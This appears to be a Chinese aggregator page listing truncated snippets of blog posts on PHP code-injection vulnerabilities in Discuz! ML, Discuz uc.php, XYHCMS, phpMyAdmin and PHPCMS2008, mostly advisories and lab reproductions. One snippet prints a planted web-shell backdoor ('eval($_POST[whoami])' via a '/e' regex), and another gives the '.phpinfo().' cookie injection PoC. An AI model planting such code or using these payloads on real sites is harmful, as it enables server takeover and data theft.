首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
【
Discuz ML! V3.X 代码注入漏洞
】的更多相关文章
Discuz ML! V3.X 代码注入漏洞
Discuz ML! V3.X 代码注入漏洞 前言 Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台,用于构建像"社交网络"这样的互联网社区. 该引擎基于Comsenz Inc.创建的着名的Discuz!X引擎开发. 漏洞描述 2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用,该漏洞利用方式简单,危害性较…
阿里云提示Discuz uc.key泄露导致代码注入漏洞uc.php的解决方法
适用所有用UC整合 阿里云提示漏洞: discuz中的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取uckey,.......... 漏洞名称:Discuz uc.key泄露导致代码注入漏洞 补丁文件:/api/uc.php 补丁来源:云盾自研 解决方法:找到文件/api/uc.php 中的以下代码: $configfile = substr($configfile, -) == , -) : $configfile; 大概216行,替换成以下: $configfile =…
Discuz uc.key泄露导致代码注入漏洞
漏洞描述:在Discuz中,uc_key是UC客户端与服务端通信的通信密钥,discuz中的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取uckey,最终进入网站后台,造成数据泄漏.您也可以登录官方网站更新到最新版本解决.最近用某云服务器的朋友比较多,都来反馈~这个漏洞,现在把修复方案分享下吧 打开/api/uc.php 第一处修改 if(!API_UPDATEBADWORDS) { return API_RETURN_FORBIDDEN; } $data = array()…
【代码审计】XYHCMS V3.5代码执行漏洞分析
0x00 环境准备 XYHCMS官网:http://www.xyhcms.com/ 网站源码版本:XYHCMS V3.5(2017-12-04 更新) 程序源码下载:http://www.xyhcms.com/Show/download/id/2/at/0.html 测试网站首页: 0x01 代码分析 1.文件位置: /App/Manage/Controller/SystemController.class.php 第194行开始: public function site() { if (…
phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
phpMyAdmin (/scripts/setup.php) PHP 注入代码 此漏洞代码在以下环境测试通过: phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本: Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2): 攻击环境要求: phpMyAdmin版本:早于2.11.9.5的2.11.x和早于3.1.3.1的3.x: …
关于Discuz! X系列远程代码执行漏洞
一.漏洞起源 突然有同事反馈,无法注册 看到这里不了解的同行估计一年懵逼,这里也是常用的漏洞攻击,可以肯定的是 badwords.php文件被修改了 ,可以查看这个文件内容 <?php $_CACHE['badwords'] = array ( 'findpattern' => array ( 'balabala' => '/.*/e', ), 'replace' => array ( 'balabala' => 'eval($_POST[whoami]);', ), );…
Discuz! ML远程代码执行(CVE-2019-13956)
Discuz! ML远程代码执行(CVE-2019-13956) 一.漏洞描述 该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行. 二.漏洞影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 三.漏洞环境搭建 1. 官网下载Discuz! ML V3.4,下载地址: http://discuz.ml/download 2. 将压缩包解压到phpstudy网站根目录,浏览器…
Discuz ML RCE漏洞
1.漏洞描述 Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行. 2.产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码. 3.影响版本: Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 4.利用exp,进行上传一句话木马 1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,…
Discuz! ML RCE漏洞 getshell 复现
0x01 影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 0x02 环境搭建 直接官网下载即可http://discuz.ml/download 将压缩包解压至phpstudy网站根目录,浏览器访问upload目录即可开始安装 之后就是傻瓜式操作,一直点击下一步就可以了,直到完成安装 0x03 漏洞Poc 随便点击一个,抓包 将Cookie中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码 0…
CVE漏洞—PHPCMS2008 /type.php代码注入高危漏洞预警
11月4日,阿里云安全首次捕获PHPCMS 2008版本的/type.php远程GetShell 0day利用攻击,攻击者可以利用该漏洞远程植入webshell,导致文件篡改.数据泄漏.服务器被远程控制等一系列严重问题.建议受影响用户尽快升级到最新版本修复. ———————PHPCMS网站内容管理系统是国内主流CMS系统之一,同时也是一个开源的PHP开发框架. PHPCMS最早于2008年推出,最新版已出到v9.6.3,但由于稳定.灵活.开源的特性,时至今日,PHPCMS2008版本仍被许多网站…